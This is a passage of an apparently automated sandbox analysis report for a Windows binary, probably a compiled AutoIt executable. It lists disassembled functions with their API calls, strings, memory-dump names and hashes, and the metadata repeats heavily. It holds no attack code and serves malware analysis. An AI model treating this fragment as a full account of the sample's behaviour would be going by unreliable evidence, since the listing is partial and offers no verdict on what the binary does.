                                                                                                                    • KillTimer.USER32(?,00000001,?,?), ref: 00324524
                                                                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00324533
                                                                                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0035D4B9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1378193009-0
                                                                                                                    • Opcode ID: d193a1ebd8c9b2323e4719010140f6b75d4d2644484da5a2e4829a406553c5a2
                                                                                                                    • Instruction ID: 15a8f9bf1c647bd5d4e580b1d86fce34551e7fa271b7de64d953fc65e4adafac
                                                                                                                    • Opcode Fuzzy Hash: d193a1ebd8c9b2323e4719010140f6b75d4d2644484da5a2e4829a406553c5a2
                                                                                                                    • Instruction Fuzzy Hash: A121F5B09047949FE733CB259845FE6BBEC9B06309F14009DEBDA5A191C7742988CB41
                                                                                                                    Function 00324C70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove
                                                                                                                    • String ID: AU3!P/;$EA06
                                                                                                                    • API String ID: 4104443479-888523718
                                                                                                                    • Opcode ID: 6c52e14050744605be922d3a8475293e5be00997a32fe12946fd50bdcf762cea
                                                                                                                    • Instruction ID: f80ecfc9d28dbe21a1b1a9b2aa5050d25e020b824360e862075e1d976dfb4729
                                                                                                                    • Opcode Fuzzy Hash: 6c52e14050744605be922d3a8475293e5be00997a32fe12946fd50bdcf762cea
                                                                                                                    • Instruction Fuzzy Hash: 60414A32A042786BDF239B64F8517BE7FA69B46300F694475EC82DF287D6309D4487A1
                                                                                                                    Function 00327285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 0035EA39
                                                                                                                    • GetOpenFileNameW.COMDLG32(?), ref: 0035EA83
                                                                                                                      • Part of subcall function 00324750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00324743,?,?,003237AE,?), ref: 00324770
                                                                                                                      • Part of subcall function 00340791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003407B0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Name$Path$FileFullLongOpen_memset
                                                                                                                    • String ID: X
                                                                                                                    • API String ID: 3777226403-3081909835
                                                                                                                    • Opcode ID: 007cd6a23feb92c912d6f721aa3e59a7d3825285216b01c7964c4967fec4f9a6
                                                                                                                    • Instruction ID: 1352edad71a541083aced095669d8e15f8a767c3c9ea30b01bdcea8f19c85da5
                                                                                                                    • Opcode Fuzzy Hash: 007cd6a23feb92c912d6f721aa3e59a7d3825285216b01c7964c4967fec4f9a6
                                                                                                                    • Instruction Fuzzy Hash: 5621D571A002589BCB03DF98D845BEE7BFCAF49314F00401AE908BB241DBB4698D8FA1
                                                                                                                    Function 00388D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __fread_nolock_memmove
                                                                                                                    • String ID: EA06
                                                                                                                    • API String ID: 1988441806-3962188686
                                                                                                                    • Opcode ID: 4e8d122725cfca7e1e31ca976203f1fa63418bd55c0db23c4f4f68affe1e7a2d
                                                                                                                    • Instruction ID: 38b37c25508ba0971b14223455d172f7898e980cf222a186aa9476ba9dfb18dd
                                                                                                                    • Opcode Fuzzy Hash: 4e8d122725cfca7e1e31ca976203f1fa63418bd55c0db23c4f4f68affe1e7a2d
                                                                                                                    • Instruction Fuzzy Hash: D201F972D042187FDB19DBA8C816EFEBBF8DB11301F00419BF552D6281E974B6088B60
                                                                                                                    Function 003898E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 003898F8
                                                                                                                    • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0038990F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Temp$FileNamePath
                                                                                                                    • String ID: aut
                                                                                                                    • API String ID: 3285503233-3010740371
                                                                                                                    • Opcode ID: 7721827d9df8df23e846f712761333fc8a289a9e986b44ca21ca5e4dd3b99e3d
                                                                                                                    • Instruction ID: 280f9000a096fcd0868764dd160e000be9ba91942bf948a3ca07e511f8c7b89f
                                                                                                                    • Opcode Fuzzy Hash: 7721827d9df8df23e846f712761333fc8a289a9e986b44ca21ca5e4dd3b99e3d
                                                                                                                    • Instruction Fuzzy Hash: DCD05E7A54030DAFDB519BE0EC0EFEA773CE704701F0006B1BA94911A1EAB0A5988B91
                                                                                                                    Function 0039CADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 93ae8b358eb9d6ca2dffcfd65ddd1db29040c8a9a4dad18d7253d25877af3387
                                                                                                                    • Instruction ID: ed2d24fc8fb8d971b604ec69ca2c4e66bad84a38706fd64fe68e3d79806169c0
                                                                                                                    • Opcode Fuzzy Hash: 93ae8b358eb9d6ca2dffcfd65ddd1db29040c8a9a4dad18d7253d25877af3387
                                                                                                                    • Instruction Fuzzy Hash: 44F15A716083019FCB15DF28C481A6ABBE5FF89314F55892EF89A9B352D730E945CF82
                                                                                                                    Function 0032434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 00324370
                                                                                                                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00324415
                                                                                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00324432
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: IconNotifyShell_$_memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1505330794-0
                                                                                                                    • Opcode ID: 6e3755ab01a7bc9b9e37d3b927063fc74609970ea4649e69fc8440157903e3cc
                                                                                                                    • Instruction ID: f1bcd730f99f101be660d07cb047a818387b099495397784997fdb12b76c1d9b
                                                                                                                    • Opcode Fuzzy Hash: 6e3755ab01a7bc9b9e37d3b927063fc74609970ea4649e69fc8440157903e3cc
                                                                                                                    • Instruction Fuzzy Hash: 033175705047118FD732DF65E88469BBBF8FB49309F000D2EF69A86291D7716944CB52
                                                                                                                    Function 0034571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __FF_MSGBANNER.LIBCMT ref: 00345733
                                                                                                                      • Part of subcall function 0034A16B: __NMSG_WRITE.LIBCMT ref: 0034A192
                                                                                                                      • Part of subcall function 0034A16B: __NMSG_WRITE.LIBCMT ref: 0034A19C
                                                                                                                    • __NMSG_WRITE.LIBCMT ref: 0034573A
                                                                                                                      • Part of subcall function 0034A1C8: GetModuleFileNameW.KERNEL32(00000000,003E33BA,00000104,?,00000001,00000000), ref: 0034A25A
                                                                                                                      • Part of subcall function 0034A1C8: ___crtMessageBoxW.LIBCMT ref: 0034A308
                                                                                                                      • Part of subcall function 0034309F: ___crtCorExitProcess.LIBCMT ref: 003430A5
                                                                                                                      • Part of subcall function 0034309F: ExitProcess.KERNEL32 ref: 003430AE
                                                                                                                      • Part of subcall function 00348B28: __getptd_noexit.LIBCMT ref: 00348B28
                                                                                                                    • RtlAllocateHeap.NTDLL(011A0000,00000000,00000001,00000000,?,?,?,00340DD3,?), ref: 0034575F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1372826849-0
                                                                                                                    • Opcode ID: 4b7c16131d72ce7d1f9b7da08ac931c87f2bfb7d9577e480e726f9c61095ee75
                                                                                                                    • Instruction ID: bd2381b60a00f52ad44159bbc21db9e7562ddca109691d73ec3dc159626c3409
                                                                                                                    • Opcode Fuzzy Hash: 4b7c16131d72ce7d1f9b7da08ac931c87f2bfb7d9577e480e726f9c61095ee75
                                                                                                                    • Instruction Fuzzy Hash: 55018C35A40A01DFE6232B78EC86A6E7BCCDB82761F110535F5559F5D2DF70BC005A61
                                                                                                                    Function 003898A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00389548,?,?,?,?,?,00000004), ref: 003898BB
                                                                                                                    • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00389548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 003898D1
                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00389548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 003898D8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$CloseCreateHandleTime
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3397143404-0
                                                                                                                    • Opcode ID: 79d75fbdc9950b868446b8f7a4c8250ea591f9f2d4ec48941375b61a83c53734
                                                                                                                    • Instruction ID: 71b4268976e541c1a60605b25098e22553c98c889be4876762ffa93c6f94b738
                                                                                                                    • Opcode Fuzzy Hash: 79d75fbdc9950b868446b8f7a4c8250ea591f9f2d4ec48941375b61a83c53734
                                                                                                                    • Instruction Fuzzy Hash: 3FE08632240214BFDB332B94EC09FDA7B1DAB07760F144221FB54690E087B115119798
                                                                                                                    Function 00388D0D Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _free.LIBCMT ref: 00388D1B
                                                                                                                      • Part of subcall function 00342D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00349A24), ref: 00342D69
                                                                                                                      • Part of subcall function 00342D55: GetLastError.KERNEL32(00000000,?,00349A24), ref: 00342D7B
                                                                                                                    • _free.LIBCMT ref: 00388D2C
                                                                                                                    • _free.LIBCMT ref: 00388D3E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 776569668-0
                                                                                                                    • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                                                                    • Instruction ID: 09f3aa0870f6815cdeb37811c747a570e590bb7f3b31c97c71d0fb956c4afd56
                                                                                                                    • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                                                                    • Instruction Fuzzy Hash: 0FE012A1A017014ACB66B678A940A9353DC4F99392F95095DB41DEF186DE64F8868224
                                                                                                                    Function 0032A9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: CALL
                                                                                                                    • API String ID: 0-4196123274
                                                                                                                    • Opcode ID: bdaf0e97a0b9778483e015ab1e1c69b1eeafed4c7c0cefb5c78eb9b8405ca226
                                                                                                                    • Instruction ID: 16c701eb4e2826a89cd953e18913c6e2302578919fca27124e620c7de21c2b1b
                                                                                                                    • Opcode Fuzzy Hash: bdaf0e97a0b9778483e015ab1e1c69b1eeafed4c7c0cefb5c78eb9b8405ca226
                                                                                                                    • Instruction Fuzzy Hash: BA226870608721DFCB2ADF14D495B2AB7E5BF85300F15896DE88A8B762D731EC45CB82
                                                                                                                    Function 00327A51 Relevance: 3.1, APIs: 2, Instructions: 97COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4104443479-0
                                                                                                                    • Opcode ID: 436c5e9091f1787ffda7db2698e9d0fff12385a901a55d8bd6dbacd160c43149
                                                                                                                    • Instruction ID: d3ed3931238bcc354ed35398d9c0f74a7afb1bda0651caf37025a2a015178c44
                                                                                                                    • Opcode Fuzzy Hash: 436c5e9091f1787ffda7db2698e9d0fff12385a901a55d8bd6dbacd160c43149
                                                                                                                    • Instruction Fuzzy Hash: B431C2B1704616AFC705DF68D8D1E69B3A9FF483207158629E919CF791EB30F960CB90
                                                                                                                    Function 003247D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • IsThemeActive.UXTHEME ref: 00324834
                                                                                                                      • Part of subcall function 0034336C: __lock.LIBCMT ref: 00343372
                                                                                                                      • Part of subcall function 0034336C: DecodePointer.KERNEL32(00000001,?,00324849,00377C74), ref: 0034337E
                                                                                                                      • Part of subcall function 0034336C: EncodePointer.KERNEL32(?,?,00324849,00377C74), ref: 00343389
                                                                                                                      • Part of subcall function 003248FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00324915
                                                                                                                      • Part of subcall function 003248FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0032492A
                                                                                                                      • Part of subcall function 00323B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00323B68
                                                                                                                      • Part of subcall function 00323B3A: IsDebuggerPresent.KERNEL32 ref: 00323B7A
                                                                                                                      • Part of subcall function 00323B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,003E52F8,003E52E0,?,?), ref: 00323BEB
                                                                                                                      • Part of subcall function 00323B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00323C6F
                                                                                                                    • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00324874
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1438897964-0
                                                                                                                    • Opcode ID: 2af2c4ad3db3dddae5e34d029f88a6b19683b1d5fbdebb8ef7153269e95add24
                                                                                                                    • Instruction ID: 7e837adba2b803fd5f1e304fe2642966444ec31b612d1401a96787559d1318ac
                                                                                                                    • Opcode Fuzzy Hash: 2af2c4ad3db3dddae5e34d029f88a6b19683b1d5fbdebb8ef7153269e95add24
                                                                                                                    • Instruction Fuzzy Hash: 4B11DF718083919FC722DF69E88590ABFECEF99750F104A1EF1418F2B1DBB19504CB82
                                                                                                                    Function 00340DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0034571C: __FF_MSGBANNER.LIBCMT ref: 00345733
                                                                                                                      • Part of subcall function 0034571C: __NMSG_WRITE.LIBCMT ref: 0034573A
                                                                                                                      • Part of subcall function 0034571C: RtlAllocateHeap.NTDLL(011A0000,00000000,00000001,00000000,?,?,?,00340DD3,?), ref: 0034575F
                                                                                                                    • std::exception::exception.LIBCMT ref: 00340DEC
                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 00340E01
                                                                                                                      • Part of subcall function 0034859B: RaiseException.KERNEL32(?,?,?,003D9E78,00000000,?,?,?,?,00340E06,?,003D9E78,?,00000001), ref: 003485F0
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3902256705-0
                                                                                                                    • Opcode ID: df86d62a670629525df30c20b0ed9a516d9880e373810c3ae0761afdf8929a30
                                                                                                                    • Instruction ID: c833f278570babf03c4d77cbb4910c449343ad90613c3ccc5c789f2a4a6a87b3
                                                                                                                    • Opcode Fuzzy Hash: df86d62a670629525df30c20b0ed9a516d9880e373810c3ae0761afdf8929a30
                                                                                                                    • Instruction Fuzzy Hash: 5BF0F435A0021966CB17BBA9EC019DF7BEC9F01315F00082AFA149E681DF70BA9486D1
                                                                                                                    Function 003455FD Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
